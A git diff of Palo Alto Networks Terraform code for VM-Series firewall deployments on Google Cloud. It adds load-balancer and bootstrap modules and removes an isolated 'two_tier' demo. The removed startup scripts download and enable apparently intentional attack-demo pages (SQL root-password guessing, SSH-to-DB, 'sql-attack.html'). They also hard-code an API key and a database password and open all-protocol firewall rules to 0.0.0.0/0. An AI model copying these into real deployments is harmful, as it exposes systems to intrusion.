+variable enable_ilbnh {
+ default = false
+}
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+ type = "list"
+ default = []
+}
+
+variable content {
+ type = "list"
+ default = []
+}
+
+variable license {
+ type = "list"
+ default = []
+}
+
+variable software {
+ default = []
+}
+
+variable randomize_bucket_name {
+ default = false
+}
+
+locals {
+ bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+ count = "${var.randomize_bucket_name}"
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ name = "${local.bucket_name}"
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = "${(length(var.config) > 0 && var.enable_ilbnh) ? length(var.config) : "0" }"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = "${(length(var.content) > 0 && var.enable_ilbnh) ? length(var.content) : "0" }"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = "${(length(var.license) > 0 && var.enable_ilbnh) ? length(var.license) : "0" }"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "software_full" {
+ count = "${(length(var.software) > 0 && var.enable_ilbnh) ? length(var.software) : "0" }"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+ count = "${(length(var.config) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "config/"
+ content = "config/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = "${(length(var.content) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "content/"
+ content = "content/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = "${(length(var.license) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "license/"
+ content = "license/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = "${(length(var.software) == 0 && var.enable_ilbnh) ? 1 : 0 }"
+ name = "software/"
+ content = "software/"
+ bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ "google_storage_bucket.bootstrap",
+ "google_storage_bucket_object.config_full",
+ "google_storage_bucket_object.content_full",
+ "google_storage_bucket_object.license_full",
+ "google_storage_bucket_object.software_full",
+ "google_storage_bucket_object.config_empty",
+ "google_storage_bucket_object.content_empty",
+ "google_storage_bucket_object.license_empty",
+ "google_storage_bucket_object.software_empty",
+ ]
+}
+
+output "completion" {
+ value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+ value = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
diff --git a/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
new file mode 100644
index 00000000..52e818e9
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
@@ -0,0 +1,51 @@
+variable enable_ilbnh {
+ default = false
+}
+variable "internal_lb_name_ilbnh" {
+ default = "ilbnh"
+}
+variable "internal_lb_ports_ilbnh" {
+ default = "22"
+}
+variable backends {
+ description = "Map backend indices to list of backend maps."
+ type = "list"
+}
+variable subnetworks {
+ type = "list"
+}
+variable "internal_lbnh_ip" {
+ default = ""
+}
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+resource "google_compute_health_check" "health_check_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}-check"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+
+ tcp_health_check {
+ port = "${var.internal_lb_ports_ilbnh}"
+ }
+}
+
+resource "google_compute_region_backend_service" "backend_service_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ health_checks = ["${google_compute_health_check.health_check_ilbnh.self_link}"]
+ backend = ["${var.backends}"]
+ session_affinity = "CLIENT_IP"
+
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" {
+ name = "${var.internal_lb_name_ilbnh}-all"
+ count = "${var.enable_ilbnh ? 1 : 0}"
+ load_balancing_scheme = "INTERNAL"
+ ip_address = "${var.internal_lbnh_ip}"
+ ip_protocol = "TCP"
+ all_ports = true
+ subnetwork = "${var.subnetworks[0]}"
+ backend_service = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
new file mode 100644
index 00000000..dcfa2fae
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
@@ -0,0 +1,172 @@
+variable enable_ilbnh {
+ default = false
+}
+variable fw_subnetworks {
+ type = "list"
+}
+
+variable fw_names {
+ type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+ type = "list"
+}
+
+variable fw_cpu_platform {
+ default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+ default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+ default = false
+}
+
+variable fw_scopes {
+ type = "list"
+
+ default = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+ type = "list"
+ default = []
+}
+
+variable create_instance_group {
+ default = false
+}
+
+variable instance_group_names {
+ type = "list"
+ default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+ type = "list"
+ default = []
+}
+
+variable fw_nic0_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic1_ip {
+ type = "list"
+ default = []
+}
+
+variable fw_nic2_ip {
+ type = "list"
+ default = []
+}
+variable instance_group {
+ type = "list"
+ default = []
+}
+
+resource "null_resource" "dependency_getter" {
+ provisioner "local-exec" {
+ command = "echo ${length(var.dependencies)}"
+ }
+}
+
+#************************************************************************************
+# CREATE VMSERIES
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+ count = "${(length(var.fw_names) > 0 && var.enable_ilbnh) ? length(var.fw_names) : "0" }"
+ name = "${element(var.fw_names, count.index)}"
+ machine_type = "${var.fw_machine_type}"
+ zone = "${element(var.fw_zones, count.index)}"
+ min_cpu_platform = "${var.fw_cpu_platform}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ tags = "${var.fw_tags}"
+
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+ serial-port-enable = true
+ sshKeys = "${var.fw_ssh_key}"
+ }
+
+ service_account {
+ scopes = "${var.fw_scopes}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[0]}"
+ network_ip = "${element(var.fw_nic0_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[1]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic1_ip, count.index)}"
+ }
+
+ network_interface {
+ subnetwork = "${var.fw_subnetworks[2]}"
+ access_config = {}
+ network_ip = "${element(var.fw_nic2_ip, count.index)}"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.fw_image}"
+ }
+ }
+
+ depends_on = [
+ "null_resource.dependency_getter",
+ ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+ count = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}"
+ name = "${element(var.instance_group_names, count.index)}"
+ zone = "${element(var.fw_zones, count.index)}"
+ instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+}
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+ value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+ value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+ value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}"
+}
+
+output "fw_nic0_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+ value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}"
+}
diff --git a/gcp/gcp-terraform-mclimans/README.md b/gcp/gcp-terraform-mclimans/README.md
deleted file mode 100644
index 7b55a4f9..00000000
--- a/gcp/gcp-terraform-mclimans/README.md
+++ /dev/null
@@ -1 +0,0 @@
-GCP terraform builds by mmclimans@paloaltonetworks.com
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/README.md b/gcp/gcp-terraform-mclimans/demo_deployments/README.md
deleted file mode 100644
index 3993db83..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/README.md
+++ /dev/null
@@ -1 +0,0 @@
-Demo deployments for testing and demonstrations in isolated enviroments. Do not use in any production environments.
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
deleted file mode 100644
index 14ab5c49..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
+++ /dev/null
@@ -1 +0,0 @@
-REPLACE THIS FILE WITH YOUR PUBLIC KEY FOR SSH ACCESS TO BACKEND VMs
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
deleted file mode 100644
index b3acf687..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
+++ /dev/null
@@ -1,3 +0,0 @@
-{
- "comment": "REPLACE THIS FILE WITH YOUR GCE API KEY (JSON FORMAT)"
-}
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
deleted file mode 100644
index 4a522608..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
+++ /dev/null
@@ -1,355 +0,0 @@
-/*
-*************************************************************************************************************
-** **
-** author: mmclimans **
-** date: 4/1/19 **
-** contact: mmclimans@paloaltonetworks.com **
-** **
-** SUPPORT POLICY **
-** **
-** This build is released under an as-is, best effort, support policy. **
-** These scripts should be seen as community supported and Palo Alto Networks will contribute our **
-** expertise as and when possible. We do not provide technical support or help in using or **
-** troubleshooting the components of the project through our normal support options such as **
-** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support **
-** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still **
-** supported, but the support is only for the product functionality and not for help in deploying or **
-** using the template or script itself. Unless explicitly tagged, all projects or work posted in our **
-** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads **
-** page on https://support.paloaltonetworks.com are provided under the best effort policy. **
-** **
-*************************************************************************************************************
-*/
-
-# SET AUTHENTICATION TO GCE API
-provider "google" {
- credentials = "${file(var.gcp_credentials_file)}"
- project = "${var.my_gcp_project}"
- region = "${var.region}"
-}
-
-############################################################################################
-############################################################################################
-# CREATE BUCKET & UPLOAD VMSERIES BOOTSTRAP FILES
-resource "google_storage_bucket" "bootstrap" {
- name = "${var.bootstrap_bucket}"
- force_destroy = true
-}
-resource "google_storage_bucket_object" "bootstrap_xml" {
- name = "config/bootstrap.xml"
- source = "bootstrap/bootstrap.xml"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "init-cfg" {
- name = "config/init-cfg.txt"
- source = "bootstrap/init-cfg.txt"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "content" {
- name = "content/panupv2-all-contents-8138-5378"
- source = "bootstrap/panupv2-all-contents-8138-5378"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "software" {
- name = "software/"
- source = "/dev/null"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "license" {
- name = "license/"
- source = "/dev/null"
- bucket = "${google_storage_bucket.bootstrap.name}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VPCS AND SUBNETS
-resource "google_compute_network" "mgmt" {
- name = "${var.mgmt_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "mgmt_subnet" {
- name = "${var.mgmt_vpc_subnet}"
- ip_cidr_range = "${var.mgmt_vpc_subnet_cidr}"
- network = "${google_compute_network.mgmt.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "untrust" {
- name = "${var.untrust_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "untrust_subnet" {
- name = "${var.untrust_vpc_subnet}"
- ip_cidr_range = "${var.untrust_vpc_subnet_cidr}"
- network = "${google_compute_network.untrust.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "web" {
- name = "${var.web_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "web_subnet" {
- name = "${var.web_vpc_subnet}"
- ip_cidr_range = "${var.web_vpc_subnet_cidr}"
- network = "${google_compute_network.web.name}"
- region = "${var.region}"
-}
-resource "google_compute_network" "db" {
- name = "${var.db_vpc}"
- auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "db_subnet" {
- name = "${var.db_vpc_subnet}"
- ip_cidr_range = "${var.db_vpc_subnet_cidr}"
- network = "${google_compute_network.db.name}"
- region = "${var.region}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC ROUTES
-resource "google_compute_route" "web_vpc_route" {
- name = "web-vpc-route"
- dest_range = "0.0.0.0/0"
- network = "${google_compute_network.web.name}"
- next_hop_ip = "${var.fw_nic2_ip}"
- priority = 100
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-resource "google_compute_route" "db_vpc_route" {
- name = "db-vpc-route"
- dest_range = "0.0.0.0/0"
- network = "${google_compute_network.db.name}"
- next_hop_ip = "${var.fw_nic3_ip}"
- priority = 100
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC FIREWALL RULES
-resource "google_compute_firewall" "mgmt_vpc_ingress" {
- name = "mgmt-ingress"
- network = "${google_compute_network.mgmt.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "icmp"
- }
- allow {
- protocol = "tcp"
- ports = ["443", "22", "3897"]
- }
-}
-resource "google_compute_firewall" "mgmt_vpc_egress" {
- name = "mgmt-vpc-egress"
- network = "${google_compute_network.mgmt.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "untrust_vpc_ingress" {
- name = "untrust-vpc-ingress"
- network = "${google_compute_network.untrust.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "untrust_vpc_egress" {
- name = "untrust-vpc-egress"
- network = "${google_compute_network.untrust.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "web_vpc_ingress" {
- name = "web-vpc-ingress"
- network = "${google_compute_network.web.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "web_vpc_egress" {
- name = "web-vpc-egress"
- network = "${google_compute_network.web.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "db_vpc_ingress" {
- name = "db-vpc-ingress"
- network = "${google_compute_network.db.name}"
- direction = "INGRESS"
- source_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-resource "google_compute_firewall" "db_vpc_egress" {
- name = "db-vpc-egress"
- network = "${google_compute_network.db.name}"
- direction = "EGRESS"
- destination_ranges = ["0.0.0.0/0"]
- allow {
- protocol = "all"
- }
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VM-SERIES
-resource "google_compute_instance" "firewall" {
- name = "${var.fw_vm_name}"
- machine_type = "${var.fw_machine_type}"
- zone = "${var.zone}"
- min_cpu_platform = "${var.fw_machine_cpu}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
-
- metadata {
- vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket}"
- serial-port-enable = true
- }
- service_account {
- scopes = "${var.fw_scopes}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.mgmt_subnet.name}"
- network_ip = "${var.fw_nic0_ip}"
- access_config = {}
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.untrust_subnet.name}"
- network_ip = "${var.fw_nic1_ip}"
- access_config = {}
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.web_subnet.name}"
- network_ip = "${var.fw_nic2_ip}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.db_subnet.name}"
- network_ip = "${var.fw_nic3_ip}"
- }
- boot_disk {
- initialize_params {
- image = "${var.fw_image}"
- }
- }
- depends_on = [
- "google_storage_bucket.bootstrap",
- "google_storage_bucket_object.bootstrap_xml",
- "google_storage_bucket_object.init-cfg",
- "google_storage_bucket_object.content",
- "google_storage_bucket_object.license",
- "google_storage_bucket_object.software",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE DB SERVER
-resource "google_compute_instance" "dbserver" {
- name = "${var.db_vm_name}"
- machine_type = "${var.db_machine_type}"
- zone = "${var.zone}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
- metadata_startup_script = "${file("${path.module}/scripts/dbserver-startup.sh")}"
- metadata {
- serial-port-enable = true
- sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.db_subnet.name}"
- network_ip = "${var.db_nic0_ip}"
- }
- service_account {
- scopes = "${var.vm_scopes}"
- }
- boot_disk {
- initialize_params {
- image = "${var.vm_image}"
- }
- }
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE WEB SERVER
-resource "google_compute_instance" "webserver" {
- name = "${var.web_vm_name}"
- machine_type = "${var.web_machine_type}"
- zone = "${var.zone}"
- can_ip_forward = true
- allow_stopping_for_update = true
- count = 1
- metadata_startup_script = "${file("${path.module}/scripts/webserver-startup.sh")}"
- metadata {
- serial-port-enable = true
- sshKeys = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
- }
- network_interface {
- subnetwork = "${google_compute_subnetwork.web_subnet.name}"
- network_ip = "${var.web_nic0_ip}"
- }
- boot_disk {
- initialize_params {
- image = "${var.vm_image}"
- }
- }
- service_account {
- scopes = "${var.vm_scopes}"
- }
- depends_on = [
- "google_compute_instance.firewall",
- "google_compute_subnetwork.mgmt_subnet",
- "google_compute_subnetwork.untrust_subnet",
- "google_compute_subnetwork.web_subnet",
- "google_compute_subnetwork.db_subnet",
- ]
-}
-
-
-############################################################################################
-############################################################################################
-output "DEPLOYMENT STATUS" {
- value = "COMPLETE"
-}
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
deleted file mode 100644
index f618cd97..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/bash
-sudo exec > >(sudo tee /var/log/user-data.log|logger -t user-data -s 2> sudo /dev/console) 2>&1
-FW_NIC3="10.5.3.4"
-while true
- do
- resp=$(curl -s -S -g -k "https://$FW_NIC3/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
- echo $resp
- if [[ $resp == *"[CDATA[yes"* ]] ; then
- break
- fi
- sleep 10s
- done
-sudo apt-get update
-sudo apt-get -y install debconf-utils
-sudo DEBIAN_FRONTEND=noninteractive | apt-get install -y mysql-server
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1')"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User=''"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_localhost';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;"
-sudo sed -i "s/.*bind-address.*/bind-address = 0.0.0.0/" /etc/mysql/mysql.conf.d/mysqld.cnf
-sudo systemctl restart mysql && sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE DATABASE Demo;"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE USER 'demouser'@'%' IDENTIFIED BY 'paloalto@123';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "GRANT ALL PRIVILEGES ON Demo.* TO 'demouser'@'%';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;"
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
deleted file mode 100644
index 02dd7129..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#! /bin/bash
-exec > >(tee /var/log/user-data.log|logger -t user-data -s 2>/dev/console) 2>&1
-dbip="10.5.3.5"
-FW_NIC2="10.5.2.4"
-while true
- do
- resp=$(curl -s -S -g -k "https://$FW_NIC2/api/?type=op&cmd=&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
- echo $resp
- if [[ $resp == *"[CDATA[yes"* ]] ; then
- break
- fi
- sleep 10s
- done
-apt-get update
-apt-get install -y apache2 wordpress
-ln -sf /usr/share/wordpress /var/www/html/wordpress
-gzip -d /usr/share/doc/wordpress/examples/setup-mysql.gz
-while true; do
- resp=$(mysql -udemouser -ppaloalto@123 -h "$dbip" -e 'show databases')
- echo "$resp"
- if [[ "$resp" = *"Demo"* ]]
- then
- break
- fi
- sleep 5s
-done
-bash /usr/share/doc/wordpress/examples/setup-mysql -n Demo -t "$dbip" "$dbip"
-sed -i "s/define('DB_USER'.*/define('DB_USER', 'demouser');/g" /etc/wordpress/config-"$dbip".php
-sed -i "s/define('DB_PASSWORD'.*/define('DB_PASSWORD', 'paloalto@123');/g" /etc/wordpress/config-"$dbip".php
-wget -O /usr/lib/cgi-bin/guess-sql-root-password.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/guess-sql-root-password.cgi
-chmod +x /usr/lib/cgi-bin/guess-sql-root-password.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/guess-sql-root-password.cgi
-wget -O /usr/lib/cgi-bin/ssh-to-db.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/ssh-to-db.cgi
-chmod +x /usr/lib/cgi-bin/ssh-to-db.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/ssh-to-db.cgi
-wget -O /var/www/html/showheaders.php https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/showheaders.php
-wget -O /var/www/html/sql-attack.html https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/sql-attack.html
-ln -sf /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
-ln -sf /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
-sudo ln -s /etc/wordpress/config-"$dbip".php /etc/wordpress/config-default.php
-systemctl restart apache2
-
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
deleted file mode 100644
index bb6e19f0..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
+++ /dev/null
@@ -1,176 +0,0 @@
-/*
-*************************************************************************************************************
-** **
-** author: mmclimans **
-** date: 4/1/19 **
-** contact: mmclimans@paloaltonetworks.com **
-** **
-** SUPPORT POLICY **
-** **
-** This build is released under an as-is, best effort, support policy. **
-** These scripts should be seen as community supported and Palo Alto Networks will contribute our **
-** expertise as and when possible. We do not provide technical support or help in using or **
-** troubleshooting the components of the project through our normal support options such as **
-** Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support **
-** options. The underlying product used (the VM-Series firewall) by the scripts or templates are still **
-** supported, but the support is only for the product functionality and not for help in deploying or **
-** using the template or script itself. Unless explicitly tagged, all projects or work posted in our **
-** GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads **
-** page on https://support.paloaltonetworks.com are provided under the best effort policy. **
-** **
-*************************************************************************************************************
-*/
-
-variable "my_gcp_project" {
- description = "Enter the Project ID of an existing GCP project:"
- # default = "my-gcp-project-0000001"
-}
-variable "gcp_credentials_file" {
- description = "Enter the JSON GCE API KEY for your environment (the json must exist in the main.tf directory)"
- # default = "gcp-credentials.json"
-}
-variable "bootstrap_bucket" {
- description = "Enter globally unique name for the new bootstrap bucket"
- # default = "vmseries-2tier-75834523984575432"
-}
-variable "gcp_key_file" {
- description = "Enter your public key (this is only required if you need to access the DB and WEB VMs):"
- # default = "gcloudkey.pub"
-}
-variable "gcp_ssh_user" {
- description = "Enter the username value associated with the GCP public key:"
- default = "ubuntu"
-}
-
-variable "fw_image" {
- # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
- # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-810"
- default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
-}
-variable "region" {
- description = "Enter the region to deploy the build:"
- default = "us-east4"
-}
-variable "zone" {
- description = "Enter the region's zone:"
- default = "us-east4-a"
-}
-
-/*
-*************************************************************************************************************
-** **
-** THE VARIABLES BELOW DO NOT BE CHANGED TO RUN THE TWO-TIER DEMO!!! **
-** **
-*************************************************************************************************************
-*/
-
-#############################################################################################################
-# GCP VPC VARIABLES
-variable "mgmt_vpc" {
- default = "mgmt-vpc"
-}
-variable "mgmt_vpc_subnet" {
- default = "mgmt-subnet"
-}
-variable "mgmt_vpc_subnet_cidr" {
- default = "10.5.0.0/24"
-}
-variable "untrust_vpc" {
- default = "untrust-vpc"
-}
-variable "untrust_vpc_subnet" {
- default = "untrust-subnet"
-}
-variable "untrust_vpc_subnet_cidr" {
- default = "10.5.1.0/24"
-}
-variable "web_vpc" {
- default = "web-vpc"
-}
-variable "web_vpc_subnet" {
- default = "web-subnet"
-}
-variable "web_vpc_subnet_cidr" {
- default = "10.5.2.0/24"
-}
-variable "db_vpc" {
- default = "db-vpc"
-}
-variable "db_vpc_subnet" {
- default = "db-subnet"
-}
-variable "db_vpc_subnet_cidr" {
- default = "10.5.3.0/24"
-}
-################################################################################################################
-################################################################################################################
-# VM-SERIES VM VARIABLES
-variable "fw_vm_name" {
- default = "vmseries-vm"
-}
-variable "fw_machine_type" {
- default = "n1-standard-4"
-}
-variable "fw_machine_cpu" {
- default = "Intel Skylake"
-}
-variable "fw_nic0_ip" {
- default = "10.5.0.4"
-}
-variable "fw_nic1_ip" {
- default = "10.5.1.4"
-}
-variable "fw_nic2_ip" {
- default = "10.5.2.4"
-}
-variable "fw_nic3_ip" {
- default = "10.5.3.4"
-}
-################################################################################################################
-################################################################################################################
-# WEB-VM VARIABLES
-variable "web_vm_name" {
- default = "web-vm"
-}
